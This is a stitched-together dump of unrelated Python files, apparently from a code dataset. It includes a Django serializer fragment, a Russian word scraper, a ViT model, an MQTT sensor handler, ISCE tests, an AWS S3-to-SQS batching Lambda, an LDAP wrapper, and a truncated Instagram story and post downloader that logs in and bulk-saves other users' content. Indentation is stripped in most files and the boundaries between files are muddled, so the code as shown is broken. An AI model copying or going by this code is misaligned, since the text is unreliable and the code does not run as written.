return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/"
def get_comments(self,obj):
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/comments/"
    def get_count(self, obj):
return Post.objects.get(pk=obj.post_id).post_comments.all().count()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import time
import requests
from bs4 import BeautifulSoup
session = requests.session()
session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0'
words = []
for page in range(1, 94+1):
if page == 1:
url = 'https://synonymonline.ru/%D0%A0'
else:
url = f'https://synonymonline.ru/%D0%A0?page={page}'
rs = session.get(url)
root = BeautifulSoup(rs.content, 'html.parser')
for a in root.select('ul.words-list > li > a'):
word = a.text.lower()
if word.startswith('ре') and word.endswith('р'):
words.append(word)
time.sleep(0.3)
print(words)
# ['реактор', 'реакционер', 'реальгар', 'реаниматор', 'ребризер', 'реверсер',
# 'реверсор', 'ревизор', 'револьвер', 'революционер', 'регар', 'регенератор',
# 'регистр', 'регистратор', 'регулятор', 'регур', 'ред-ривер', 'редактор',
# 'редуктор', 'реестр', 'режиссер', 'резервуар', 'резистер', 'резистивиметр',
# 'резистор', 'резонатор', 'резонер', 'резус-фактор', 'рейбер', 'рейбор',
# 'рейвер', 'рейдер', 'рейнджер', 'рейнир', 'рейсфедер', 'рейтар', 'рейтер',
# 'рейхсвер', 'рейхсканцлер', 'рекетер', 'рекетмейстер', 'реклаймер',
# 'реконструктор', 'рекордер', 'рекрутер', 'ректификатор', 'ректор', 'рекуператор',
# 'релаксатор', 'рельсотранспортер', 'реляксатор', 'ремер', 'ремитер', 'ремонтер',
# 'рентгенгенератор', 'рентгенгониометр', 'рентгенметр', 'рентгеноанализатор',
# 'рентгеногониометр', 'рентгенометр', 'рентгеноспектр', 'рентгеноспектрометр',
# 'рентгеностереометр', 'рентгенотелевизор', 'рентгенофотометр', 'реоанализатор',
# 'реолавер', 'реометр', 'реомонитор', 'реомюр', 'реопирометр', 'реорганизатор',
# 'репеллер', 'репер', 'репертуар', 'реперфоратор', 'репетир', 'репетитор',
# 'репитер', 'репитор', 'репортер', 'репрессор', 'репродуктор', 'репшнур',
# 'ресивер', 'рессивер', 'реставратор', 'ресторатор', 'ретардер', 'ретинопротектор',
# 'ретранслятор', 'ретровир', 'ретур', 'ретушер', 'рефлектомер', 'рефлектометр',
# 'рефлектор', 'реформатор', 'рефрактомер', 'рефрактометр', 'рефрактор',
# 'рефрижератор', 'рефулер', 'рецептор', 'решофер']
|
nilq/baby-python
|
python
|
import torch
import torch.nn as nn
from einops.layers.torch import Rearrange
# This model is modified from https://github.com/lucidrains/vit-pytorch
class ViT(nn.Module):
def __init__(self, image_size, patch_size, dim, transformer, num_classes, channels=3, joint=True):
super().__init__()
num_patches = (image_size // patch_size) ** 2
patch_dim = channels * patch_size ** 2
self.joint = joint
self.to_patch_embedding = nn.Sequential(
Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size),
nn.Linear(patch_dim, dim),
)
self.pos_embedding = nn.Parameter(torch.randn(1, num_patches, dim))
self.transformer = transformer
self.mlp_head = nn.Sequential(
nn.LayerNorm(dim),
nn.Linear(dim, num_classes)
)
def forward(self, img1, img2=None):
if not self.joint:
x1 = self.to_patch_embedding(img1)
b, n, _ = x1.shape
x1 += self.pos_embedding[:, :n]
x1 = self.transformer(x1)
x1 = x1.mean(dim=1)
return self.mlp_head(x1)
x1 = self.to_patch_embedding(img1)
x2 = self.to_patch_embedding(img2)
b, n, _ = x1.shape
x1 += self.pos_embedding[:, :n]
x2 += self.pos_embedding[:, :n]
x = torch.cat((x1, x2), dim=1)
x = self.transformer(x)
x = self.mlp_head(x)
if self.training:
return x.reshape(x.shape[0] * x.shape[1], -1)
else:
return x.mean(dim=1)
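# --- Illustrative usage sketch (not part of the original module). ---
# `transformer` can be any module mapping (B, N, dim) -> (B, N, dim); a stock
# nn.TransformerEncoder (PyTorch >= 1.9 for batch_first) is used as a stand-in.
if __name__ == '__main__':
    encoder = nn.TransformerEncoder(
        nn.TransformerEncoderLayer(d_model=128, nhead=4, batch_first=True),
        num_layers=2)
    model = ViT(image_size=64, patch_size=16, dim=128,
                transformer=encoder, num_classes=10, joint=False)
    logits = model(torch.randn(2, 3, 64, 64))  # -> shape (2, 10)
    print(logits.shape)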
|
nilq/baby-python
|
python
|
import os
import signal
import asyncio
import datetime
import json
import logging
import edgefarm_application as ef
from schema_loader import schema_read
#
# Using the ads_producer/encoder, you can publish a message towards ADS
#
ads_producer = None
ads_encoder = None
async def temperature_handler(msg):
"""This is the handler function that gets registered for `simulation/temperature`.
The received data is a python dictionary.
msg['payload'] is the MQTT message as received from MQTT. Here, the payload is
a json message, so we convert the json to a python dictionary.
This example encodes the data it into an ADS_DATA avro message.
The payload in ADS_DATA is another AVRO message with a schema for a temperature sensor (see `schemas/temperature_data.avsc`)
The whole ADS_DATA message is then sent to ads-node module.
"""
org_payload = json.loads(msg["payload"])
print(f"{msg}: payload={org_payload}")
if org_payload["sensorname"] == "temperature":
print(org_payload)
# Generate an ADS payload with "temperature_data" schema
ads_payload = {
"meta": {"version": b"\x01\x00\x00"},
"data": {
"time": datetime.datetime.fromtimestamp(int(org_payload["timestamp"])),
"temp": float(org_payload["value"]),
},
}
# Send data to ads node module
await ads_producer.encode_and_send(ads_encoder, ads_payload)
else:
print(f"Received unknown payload: {org_payload}")
# List of mqtt topics and corresponding handlers
# Example:
# topics = {
# 'simulation/temperature': temp_handler,
# 'simulation/acceleration': accel_handler
# }
topics = {"environment/temperature": temperature_handler}
async def main():
global ads_producer, ads_encoder
loop = asyncio.get_event_loop()
# Initialize EdgeFarm SDK
if os.getenv("IOTEDGE_MODULEID") is not None:
await ef.application_module_init_from_environment(loop)
else:
print("Warning: Running example outside IOTEDGE environment")
await ef.application_module_init(loop, "", "", "")
ads_producer = ef.AdsProducer()
# Create an encoder for an application specific payload
payload_schema = schema_read(__file__, "temperature_data")
ads_encoder = ef.AdsEncoder(
payload_schema,
schema_name="temperature_data",
schema_version=(1, 0, 0),
tags={"monitor": "channel1"},
)
# Connect to EdgeFarm service module mqtt-bridge and register the MQTT subjects we want to receive
mqtt_client = ef.AlmMqttModuleClient()
for mqtt_topic, handler in topics.items():
print(f"Registering to '{mqtt_topic}'")
await mqtt_client.subscribe(mqtt_topic, handler)
#
# The following shuts down gracefully when SIGINT or SIGTERM is received
#
stop = {"stop": False}
def signal_handler():
stop["stop"] = True
for sig in ("SIGINT", "SIGTERM"):
loop.add_signal_handler(getattr(signal, sig), signal_handler)
while not stop["stop"]:
await asyncio.sleep(1)
print("Unsubscribing and shutting down...")
await mqtt_client.close()
await ef.application_module_term()
if __name__ == "__main__":
logging.basicConfig(
level=os.environ.get("LOGLEVEL", "INFO").upper(),
format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
asyncio.run(main())
|
nilq/baby-python
|
python
|
import datetime
import unittest
import isce
from isceobj.Orbit.Orbit import StateVector
class StateVectorTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testEqualCompare(self):
"""
Test that __cmp__ returns true when the times are the same, but the
positions and velocities are different.
"""
sv1 = StateVector()
time1 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,
second=4)
pos1 = [1.0,2.0,3.0]
vel1 = [0.6,0.6,0.6]
sv1.setTime(time1)
sv1.setPosition(pos1)
sv1.setVelocity(vel1)
sv2 = StateVector()
time2 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,
second=4)
pos2 = [2.0,3.0,4.0]
vel2 = [0.7,0.7,0.7]
sv2.setTime(time2)
sv2.setPosition(pos2)
sv2.setVelocity(vel2)
self.assertTrue(sv1 == sv2)
def testNotEqualCompare(self):
"""
Test that __cmp__ returns false when the times are different, but the
positions and velocities are the same.
"""
sv1 = StateVector()
time1 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,second=5)
pos1 = [1.0,2.0,3.0]
vel1 = [0.6,0.6,0.6]
sv1.setTime(time1)
sv1.setPosition(pos1)
sv1.setVelocity(vel1)
sv2 = StateVector()
time2 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,second=4)
pos2 = [1.0,2.0,3.0]
vel2 = [0.6,0.6,0.6]
sv2.setTime(time2)
sv2.setPosition(pos2)
sv2.setVelocity(vel2)
self.assertFalse(sv1 == sv2)
def testScalarVelocity(self):
"""
Test that the scalar velocity returns the expected value
"""
ans = 0.0288675134594813
sv1 = StateVector()
time1 = datetime.datetime(year=2001,month=2,day=7,hour=12,minute=13,
second=5)
pos1 = [1.0,2.0,3.0]
vel1 = [0.0166666,0.0166666,0.0166666]
sv1.setTime(time1)
sv1.setPosition(pos1)
sv1.setVelocity(vel1)
vel = sv1.getScalarVelocity()
self.assertAlmostEqual(ans,vel,5)
if __name__ == "__main__":
unittest.main()
|
nilq/baby-python
|
python
|
"""Batching Lambda function - puts all S3 objects into SQS to be re-analyzed."""
# Expects the following environment variables:
# BATCH_LAMBDA_NAME: The name of this Lambda function.
# BATCH_LAMBDA_QUALIFIER: The qualifier (alias) which is used to invoke this function.
# OBJECTS_PER_MESSAGE: The number of S3 objects to pack into a single SQS message.
# S3_BUCKET_NAME: Name of the S3 bucket to enumerate.
# SQS_QUEUE_URL: URL of the SQS queue which will buffer all of the S3 objects for analysis.
import json
import logging
import os
import boto3
LOGGER = logging.getLogger()
LOGGER.setLevel(logging.INFO)
LAMBDA_CLIENT = boto3.client('lambda')
S3_CLIENT = boto3.client('s3')
SQS_CLIENT = boto3.client('sqs')
class SQSMessage(object):
"""Encapsulates a single SQS message (which will contain multiple S3 keys)."""
def __init__(self, msg_id):
"""Create a new message structure, which will store a list of S3 keys.
Args:
msg_id: [int] Message index in the global list.
"""
self._id = msg_id
self._keys = []
@property
def num_keys(self):
"""Returns [int] the number of keys stored in the SQS message so far."""
return len(self._keys)
def add_key(self, key):
"""Add another S3 key (string) to the message."""
self._keys.append(key)
def sqs_entry(self):
"""Returns a message entry [dict], as required by sqs_client.send_message_batch().
Moreover, the message body matches the structure of an S3 added event. This gives all
messages in the SQS the same format and enables the dispatcher to parse them consistently.
"""
return {
'Id': str(self._id),
'MessageBody': json.dumps({
'Records': [{'s3': {'object': {'key': key}}} for key in self._keys]
})
}
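    # Example (illustrative): for _id 0 and keys ["a.exe", "b.exe"], sqs_entry()
    # returns {'Id': '0', 'MessageBody':
    #     '{"Records": [{"s3": {"object": {"key": "a.exe"}}},
    #                   {"s3": {"object": {"key": "b.exe"}}}]}'}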
def reset(self):
"""Remove the stored list of S3 keys."""
self._keys = []
class SQSBatcher(object):
"""Collect groups of S3 keys and batch them into as few SQS requests as possible."""
def __init__(self, queue_url, objects_per_message, messages_per_batch=10):
"""Create a new SQS batcher.
Args:
queue_url: [string] URL of the queue to send messages to.
objects_per_message: [int] The maximum number of S3 keys to put in each SQS message.
messages_per_batch: [int] The maximum number of SQS messages to batch together.
SQS caps this value at 10.
Note that the downstream analyzer Lambdas will each process at most
(objects_per_message * messages_per_batch) binaries. The analyzer runtime limit is the
ultimate constraint on the size of each batch.
"""
self._queue_url = queue_url
self._objects_per_message = objects_per_message
self._messages_per_batch = messages_per_batch
self._messages = [SQSMessage(i) for i in range(messages_per_batch)]
self._msg_index = 0 # The index of the SQS message where keys are currently being added.
# The first and last keys added to this batch.
self._first_key = None
self._last_key = None
def _send_batch(self):
"""Group keys into messages and make a single batch request."""
LOGGER.info('Sending SQS batch of %d keys: %s ... %s',
sum(msg.num_keys for msg in self._messages), self._first_key, self._last_key)
response = SQS_CLIENT.send_message_batch(
QueueUrl=self._queue_url,
Entries=[msg.sqs_entry() for msg in self._messages if msg.num_keys > 0]
)
failures = response.get('Failed', [])
if failures:
for failure in failures:
                LOGGER.error('Unable to enqueue SQS message %s: %s',
                             failure['Id'], failure['Message'])
boto3.client('cloudwatch').put_metric_data(Namespace='BinaryAlert', MetricData=[{
'MetricName': 'BatchEnqueueFailures',
'Value': len(failures),
'Unit': 'Count'
}])
for msg in self._messages:
msg.reset()
self._first_key = None
def add_key(self, key):
"""Add a new S3 key [string] to the message batch and send to SQS if necessary."""
if not self._first_key:
self._first_key = key
self._last_key = key
msg = self._messages[self._msg_index]
msg.add_key(key)
# If the current message is full, move to the next one.
if msg.num_keys == self._objects_per_message:
self._msg_index += 1
# If all of the messages are full, fire off to SQS.
if self._msg_index == self._messages_per_batch:
self._send_batch()
self._msg_index = 0
def finalize(self):
"""After all messages have been added, send the remaining as a last batch to SQS."""
if self._first_key:
LOGGER.info('Finalize: sending last batch of keys')
self._send_batch()
class S3BucketEnumerator(object):
"""Enumerates all of the S3 objects in a given bucket."""
def __init__(self, bucket_name, continuation_token=None):
"""Instantiate with an optional continuation token.
Args:
bucket_name: [string] Name of the S3 bucket to enumerate.
continuation_token: [string] Continuation token returned from S3 list objects.
"""
self.bucket_name = bucket_name
self.continuation_token = continuation_token
self.finished = False # Have we finished enumerating all of the S3 bucket?
def next_page(self):
"""Get the next page of S3 objects.
Returns:
List of string S3 object keys. Also sets self.finished = True if this is the last page.
"""
if self.continuation_token:
response = S3_CLIENT.list_objects_v2(
Bucket=self.bucket_name, ContinuationToken=self.continuation_token)
else:
response = S3_CLIENT.list_objects_v2(Bucket=self.bucket_name)
self.continuation_token = response.get('NextContinuationToken')
if not response['IsTruncated']:
self.finished = True
        return [obj['Key'] for obj in response.get('Contents', [])]
def batch_lambda_handler(event, lambda_context):
"""Entry point for the batch Lambda function.
Args:
event: [dict] Invocation event. If 'S3ContinuationToken' is one of the keys, the S3 bucket
will be enumerated beginning with that continuation token.
lambda_context: [LambdaContext] object with .get_remaining_time_in_millis().
Returns:
[int] The number of enumerated S3 keys.
"""
LOGGER.info('Invoked with event %s', json.dumps(event))
s3_enumerator = S3BucketEnumerator(
os.environ['S3_BUCKET_NAME'], event.get('S3ContinuationToken'))
sqs_batcher = SQSBatcher(os.environ['SQS_QUEUE_URL'], int(os.environ['OBJECTS_PER_MESSAGE']))
# As long as there are at least 10 seconds remaining, enumerate S3 objects into SQS.
num_keys = 0
while lambda_context.get_remaining_time_in_millis() > 10000 and not s3_enumerator.finished:
keys = s3_enumerator.next_page()
num_keys += len(keys)
for key in keys:
sqs_batcher.add_key(key)
# Send the last batch of keys.
sqs_batcher.finalize()
# If the enumerator has not yet finished but we're low on time, invoke this function again.
if not s3_enumerator.finished:
LOGGER.info('Invoking another batcher')
LAMBDA_CLIENT.invoke(
FunctionName=os.environ['BATCH_LAMBDA_NAME'],
InvocationType='Event', # Asynchronous invocation.
Payload=json.dumps({'S3ContinuationToken': s3_enumerator.continuation_token}),
Qualifier=os.environ['BATCH_LAMBDA_QUALIFIER']
)
return num_keys
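# Example manual invocation event (illustrative); the token value is a
# placeholder for whatever list_objects_v2 returned on a previous run:
# {"S3ContinuationToken": "..."}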
|
nilq/baby-python
|
python
|
from cmanager import CreditManager
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import ldap
#import ldap.modlist as modlist
from brie.config import ldap_config
from brie.lib.log_helper import BrieLogging
from brie.model.ldap import Groupes
class Groups(object):
__groups = list()
def __init__(self, groups):
self.__groups = groups
#end def
def __getattr__(self, name):
return name in self.__groups
#end def
def list(self):
return list(self.__groups)
#end def
#end class
class User(object):
ldap_bind = None
attrs = None
groups = None
residence_dn = None
def __init__(self, ldap_bind, attrs, residence_dn = None):
self.ldap_bind = ldap_bind
self.attrs = attrs
self.residence_dn = residence_dn
if attrs is not None:
groups = Groupes.get_by_user_dn(self, residence_dn, self.attrs.dn)
self.groups = Groups(groups)
#end if
#end def
#end class
""" Classe de manipulation de la base ldap """
class Ldap(object):
__connection = None
""" Connexion à la base """
def __init__(self, connection):
self.__connection = connection
#end def
""" Methode de connexion à la base de donnée
dn : dn de connexion
password : mot de passe
"""
@staticmethod
def connect(dn, password):
connection = None
# try:
connection = ldap.initialize(ldap_config.uri)
connection.simple_bind_s(dn, password)
# except:
# return None
#end try
if connection is not None:
return Ldap(connection)
#end
return None
#end def
""" Recherche sur la base
dn : base de recherche
filter : filtre ldap de recherche
scope : portée de recherche (SCOPE_SUBTREE, SCOPE_BASE, SCOPE_ONELEVEL)
"""
def search(self, dn, filter, scope = ldap.SCOPE_SUBTREE):
dn = Ldap.str_attribute(dn)
filter = Ldap.str_attribute(filter)
try:
results = self.__connection.search_s(dn, scope, filter)
except ldap.NO_SUCH_OBJECT:
return []
#end try
ldap_results = []
for result in results:
result_dn = result[0]
attributes = result[1]
val_dict = dict()
for attribute in attributes.iteritems():
name = attribute[0]
values = attribute[1]
ldap_value = LdapAttribute(name, values)
val_dict[name] = ldap_value
#end for
ldap_result = LdapEntry(result_dn, val_dict)
ldap_results.append(ldap_result)
#end for
return ldap_results
#end def
def get_childs(self, dn, filter = "(objectClass=*)"):
results = self.search(dn, filter)
tree = [None, dict()]
for result in results:
if result.dn == dn:
tree[0] = result
else:
result_dn = result.dn.replace(dn, "").split(",")
tree_c = tree
result_dn.reverse()
for dn_split in result_dn:
if dn_split != "":
if not dn_split in tree_c[1]:
tree_c[1][dn_split] = [None, dict()]
tree_c = tree_c[1][dn_split]
else:
tree_c = tree_c[1][dn_split]
#end if
#end if
#end for
tree_c[0] = result
#end if
#end for
return LdapEntryTree(tree[0], tree[1])
#end def
""" Recherche le premier resultat sur la base
appel la methode "search" en interne
"""
def search_first(self, dn, filter, scope = ldap.SCOPE_SUBTREE):
results = self.search(dn, filter, scope)
if results is None: return None
for result in results:
return result
#end for
return None
#end def
""" Recherche seulement l'element décrit par le dn donnée """
def search_dn(self, dn):
return self.search_first(dn, "(objectClass=*)", ldap.SCOPE_BASE)
@staticmethod
def str_attributes(attributes):
def str_value(value):
if isinstance(value, list):
return [Ldap.str_attribute(subval) for subval in value]
#end if
return Ldap.str_attribute(value)
#end def
return dict([
(keyval[0], str_value(keyval[1]))
for keyval in attributes.iteritems()
])
#end def
@staticmethod
def str_attributes_list(attributes):
def str_value(value):
if isinstance(value, list):
return [Ldap.str_attribute(subval) for subval in value]
elif isinstance(value, LdapAttribute):
return [Ldap.str_attribute(subval) for subval in value.all()]
#end if
return Ldap.str_attribute(value)
#end def
return dict([
(keyval, str_value(attributes[keyval]))
for keyval in attributes
])
#end def
@staticmethod
def str_attribute(value):
if isinstance(value, str):
return value
elif isinstance(value, unicode):
return unicode.encode(value, "utf-8")
#end if
return str(value)
#end def
""" Remplace les attributs d'un dn donné
dn : adresse de l'élément
attributes : dictionnaire d'attributs
"""
def replace_attr(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((ldap.MOD_REPLACE, attribute[0], attribute[1]))
#end for
self.__connection.modify_s(dn, modlist)
#end def
""" Ajouter les attributs d'un dn donné
dn : addresse de l'élément
attributes : dictionnaire des nouveaux attributs
"""
def add_attr(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((ldap.MOD_ADD, attribute[0], attribute[1]))
#end for
try:
self.__connection.modify_s(dn, modlist)
except ldap.TYPE_OR_VALUE_EXISTS:
pass
#end def
""" Supprime les attributs d'un dn donné
dn : adresse de l'élément
attributes : dictionnaire des attributs à supprimer
"""
def delete_attr(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((ldap.MOD_DELETE, attribute[0], attribute[1]))
#end for
#try:
self.__connection.modify_s(dn, modlist)
#except:
# pass
#end def
""" Ajoute un nouvelle élément
dn : adresse du nouvelle élément
attributes : dictionnaire des attributes de l'élément
"""
def add_entry(self, dn, attributes):
attributes = Ldap.str_attributes(attributes)
modlist = []
for attribute in attributes.iteritems():
modlist.append((attribute[0], attribute[1]))
#end for
##try:
self.__connection.add_s(dn, modlist)
##except:
## pass
#end def
""" Clone un élément
dn : adresse du nouvelle élément
attributes : l'élément à cloner
"""
def clone_entry(self, dn, ldap_entry):
attributes = Ldap.str_attributes_list(ldap_entry.__dict__)
del attributes['dn']
modlist = []
for attribute in attributes.iteritems():
modlist.append((attribute[0], attribute[1]))
#end for
##try:
self.__connection.add_s(dn, modlist)
##except:
## pass
#end def
""" Supprime un élement donné """
def delete_entry(self, dn):
#try:
self.__connection.delete_s(dn)
#except:
# pass
#end def
""" Supprime récursivement un élément et ses fils """
def delete_entry_subtree(self, dn):
entries = self.search(dn, "(objectClass=*)")
for entry in reversed(entries):
self.delete_entry(entry.dn)
#end for
#end def
""" Renomme un élément """
def rename_entry(self, dn, newdn, superior):
self.__connection.rename_s(dn, newdn, newsuperior= superior)
""" Sauvegarde en base une valeur l'élément donné """
def save(self, ldap_entry):
modlist = []
for global_deletion in ldap_entry._deletions:
modlist.append((ldap.MOD_DELETE, global_deletion, None))
#end for
ldap_entry._deletions = []
ldap_attributes = (
attribute
for attribute in ldap_entry.__dict__.itervalues()
if isinstance(attribute, LdapAttribute)
)
for ldap_attribute in ldap_attributes:
BrieLogging.get().debug("name : " + ldap_attribute.name)
BrieLogging.get().debug("values : " + str(ldap_attribute.values))
BrieLogging.get().debug("deletions : " + str(ldap_attribute._deletions))
BrieLogging.get().debug("additions : " + str(ldap_attribute._additions))
BrieLogging.get().debug("modified : " + str(ldap_attribute._modified))
if ldap_attribute._deletions != []:
str_values = [str(value) for value in ldap_attribute._deletions]
modlist.append((ldap.MOD_DELETE, ldap_attribute.name, str_values))
ldap_attribute._deletions = []
#end if
if ldap_attribute._additions != []:
str_values = [str(value) for value in ldap_attribute._additions]
modlist.append((ldap.MOD_ADD, ldap_attribute.name, str_values))
ldap_attribute._additions = []
#end if
if ldap_attribute._modified:
str_values = [str(value) for value in ldap_attribute.values]
modlist.append((ldap.MOD_REPLACE, ldap_attribute.name, str_values))
ldap_attribute._modified = False
#end for
#end for
BrieLogging.get().debug("dn : " + ldap_entry.dn)
BrieLogging.get().debug("modlist : " + str(modlist))
if modlist != []:
self.__connection.modify_s(ldap_entry.dn, modlist)
            # Reload the entry after saving
entry_reloaded = self.search_dn(ldap_entry.dn)
ldap_entry.__dict__ = entry_reloaded.__dict__
#end def
""" Ferme la connexion à la base """
def close(self):
self.__connection.unbind()
#end class
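# --- Illustrative usage sketch (not part of the original module). ---
# Assumes ldap_config.uri points at a reachable server; the DN, password and
# attribute values below are placeholders.
#
# connection = Ldap.connect("cn=admin,dc=example,dc=org", "secret")
# if connection is not None:
#     entry = connection.search_first("dc=example,dc=org", "(uid=jdoe)")
#     if entry is not None:
#         entry.get("mail").add("jdoe@example.org")
#         connection.save(entry)
#     connection.close()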
""" Classe représentant un élément ldap """
class LdapEntry(object):
dn = None
    _deletions = []
    def __init__(self, dn, var_dict):
        self.__dict__ = var_dict
        self.dn = dn.decode("utf-8")
        # per-instance deletion queue (the class-level list would be
        # shared by every entry)
        self._deletions = []
    #end def
""" Retourne si un attribut existe sur cette élément """
def has(self, attribute_name):
return attribute_name in self.__dict__
#end def
""" Retourne la valeur d'un attribut donné """
def get(self, name):
if name in self.__dict__:
return self.__dict__[name]
else:
return self.__getattr__(name)
#end if
#end def
def __getattr__(self, name):
attr = LdapAttribute(name, [])
self.__dict__[name] = attr
return attr
#end def
""" Ajoute un attribut """
def add(self, name, value = None):
if self.has(name):
if value is not None:
value = self.get(name)
value.add(value)
#end if
else:
values = []
if value is not None:
values = [value]
#end if
self.__dict__[name] = LdapAttribute(name, values)
self.__dict__[name]._additions = values
#end if
#end def
""" Supprime un attribut """
def delete(self, name, value = None):
if self.has(name):
if value is not None:
value = self.get(name)
value.delete(value)
else:
del self.__dict__[name]
self._deletions.append(name)
#end if
#end if
#end def
#end class
""" Classe représentant la valeur d'un attribut """
class LdapAttribute(object):
name = None
values = None
_deletions = None
_additions = None
_modified = False
def __init__(self, name, values):
self.values = [value.decode("utf-8") for value in values]
self.name = name
self._deletions = list()
self._additions = list()
#end def
""" Retourne la première valeur de cet attribut """
def first(self, default = None):
for value in self.values:
return unicode(value)
#end for
if default is None:
return None
return unicode(default)
#end def
""" Retourne toutes les valeurs de cet attribut """
def all(self):
return self.values
#end def
""" Ajoute une valeur à cet attribut
Note : la valeur ne sera pas ajouté si elle existe déjà
"""
def add(self, value):
if not value in self.values:
self.values.append(value)
self._additions.append(value)
#end if
#end def
""" Supprime une valeur de cet attribut """
def delete(self, value):
if value in self.values:
self.values = [old for old in self.values if old != value]
            # If it was just added, simply remove it
            # from the addition queue,
            # otherwise add it to the deletion queue
if value in self._additions:
self._additions = [old for old in self._additions if old != value]
else:
self._deletions.append(value)
#end if
#end if
#end def
""" Modifie une valeur de cet attribut
si la valeur est nulle, modifie la première valeur
"""
def replace(self, old, new):
if old == new:
return
        # Standard replacement helper
def replace(current):
if current == old:
return new
#end if
return current
#end def
        # If the new value already exists,
        # the old value is simply deleted
if new in self.values:
self.delete(old)
elif self.values == []:
self.add(new)
else:
self.values = [replace(value) for value in self.values]
            # If the replaced value was just added,
            # it is updated in the addition queue
self._additions = [replace(value) for value in self._additions]
self._modified = True
#end if
#end def
#end class
class LdapEntryTree(LdapEntry):
childs = None
val = None
def __init__(self, val, childs):
self.val = val
self.__dict__ = val.__dict__
self.__dict__['value'] = val
self.childs = dict()
if len(childs) > 0:
for key,child in childs.iteritems():
key = key.split("=")[1]
self.childs[key] = LdapEntryTree(child[0], child[1])
self.__dict__[key] = self.childs[key]
#end for
#end if
#end def
def __getattr__(self, name):
attr = LdapAttribute(name, [])
self.__dict__[name] = attr
return attr
#end def
#end class
|
nilq/baby-python
|
python
|
import sys
import json
import twint
import threading
import lzma
import glob
import instaloader
import os
import shutil
from datetime import datetime
from googleapiclient.discovery import build
from facebook_scraper import get_posts
from PySide2.QtQml import QQmlApplicationEngine
from PySide2.QtCore import QObject, Slot, Signal, QTimer, QUrl
from PySide2.QtGui import QGuiApplication, QIcon
class storyThread (threading.Thread):
def __init__(self,name, kullaniciAdi,sifre):
threading.Thread.__init__(self)
self.name = name
self.kullaniciAdi = kullaniciAdi
self.sifre = sifre
def run(self):
self.downloadStories(self.name,self.kullaniciAdi,self.sifre)
def downloadStories(self, allUsers,kullaniciAdi,sifre):
L = instaloader.Instaloader()
L.login(str(kullaniciAdi), str(sifre))
L2 = instaloader.Instaloader()
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Story)"
list_username = allUsers.split("-")
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
            print(
                "Folder already exists. Please check it. If the error persists, delete the %s folder inside Senfonico Linkler and try again." % directoryFirst)
for i in list_username:
profile = L2.check_profile_id(i)
L.download_stories(userids=[profile.userid])
path_stories = ":stories"
jpg_files = glob.glob(path_stories + "/**/*.jpg", recursive=True)
json_files = glob.glob(path_stories + "/**/*.xz", recursive=True)
mp4_files = glob.glob(path_stories + "/**/*.mp4", recursive=True)
for jsonAd in json_files:
index = jsonAd.find("json.xz")
newJson = jsonAd[:33]
newJpeg = newJson + "jpg"
newMp4 = newJson + "mp4"
jpeg = newJpeg.replace("\\", "/")
mp4 = newMp4.replace("\\", "/")
with lzma.open(jsonAd, mode='rt') as file:
for line in file:
a = line.find("username\":\"")
c = -1
for b in line[a + 11:]:
c = c + 1
if b == "\"":
username = line[a + 11:a + c + 11]
directory = username +" " +str(datetime.now().hour)+"."+str(datetime.now().minute)
parent_dir = path_directoryFirst
path = os.path.join(parent_dir, directory)
try:
os.makedirs(path, exist_ok=True)
except OSError as error:
print("%s Dosya önceden oluşturulmuş. Lütfen kontrol et" % directory)
try:
original = jpeg
target = path
if os.path.isfile(mp4):
shutil.move(mp4, target)
else:
shutil.move(original, target)
except shutil.Error as e:
print(e)
break
try:
shutil.rmtree(":stories")
except FileNotFoundError as error:
print(i + " için story bulunamadı")
class instagramThread (threading.Thread):
def __init__(self,name, dateStart , dateEnd,kullaniciAdi, sifre):
threading.Thread.__init__(self)
self.dateStart = dateStart
self.name = name
self.dateEnd = dateEnd
self.kullaniciAdi = kullaniciAdi
self.sifre = sifre
def run(self):
startList = self.dateStart.split("-")
endList = self.dateEnd.split("-")
self.getInstagramLink(int(startList[0]),
int(startList[1]),
int(startList[2]),
int(endList[0]),
int(endList[1]),
int(endList[2]),
self.name,self.kullaniciAdi,self.sifre)
def getInstagramLink(self, sYil, sAy, sGun, eYil, eAy, eGun, allUsers, kullaniciAdi, sifre):
L = instaloader.Instaloader()
L.login(str(kullaniciAdi), str(sifre))
start = datetime(sYil, sAy, sGun)
end = datetime(eYil, eAy, eGun)
list_username = allUsers.split("-")
dateDirectory = str(datetime.now().year) + "-" + str(datetime.now().month) + "-" + str(
datetime.now().day) + " (Instagram)"
directoryFirst = dateDirectory
parent_dirFirst = "C:/Users/" + os.getlogin() + "/Desktop/Senfonico Linkler/"
path_directoryFirst = os.path.join(parent_dirFirst, directoryFirst)
try:
os.makedirs(path_directoryFirst, exist_ok=True)
path_directoryFirst = os.path.realpath(path_directoryFirst)
os.startfile(path_directoryFirst)
print("Directory '%s' created successfully" % directoryFirst)
except OSError as error:
            print(
                "Folder already exists. Please check it. If the error persists, delete the %s folder inside Senfonico Linkler and try again." % directoryFirst)
for username in list_username:
text = path_directoryFirst + "/" + username + " " + str(datetime.now().hour) + "." + str(
